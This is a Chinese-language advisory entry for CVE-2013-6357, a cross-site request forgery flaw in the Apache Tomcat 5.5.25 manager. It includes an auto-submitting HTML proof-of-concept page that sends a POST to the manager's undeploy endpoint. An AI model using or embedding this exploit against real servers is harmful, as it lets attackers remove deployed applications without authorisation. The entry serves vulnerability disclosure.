CVE ID:CVE-2013-6357
Apache Tomcat是一款开放源码的JSP应用服务器程序。
Apache Tomcat 管理应用程序中存在跨站请求伪造漏洞,攻击者可以通过POST方法操纵应用程序部署。
0
Apache Tomcat 5.5.25
目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
Undeploy Applications
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to Undeploy an Application</H2>
<form method="POST" name="form0" action="http://<tomcat_ip>:<tomcat_tcp/port>/manager/html/undeploy?path=/<name_of_application_to_undeploy>">
</form>
</body>
</html>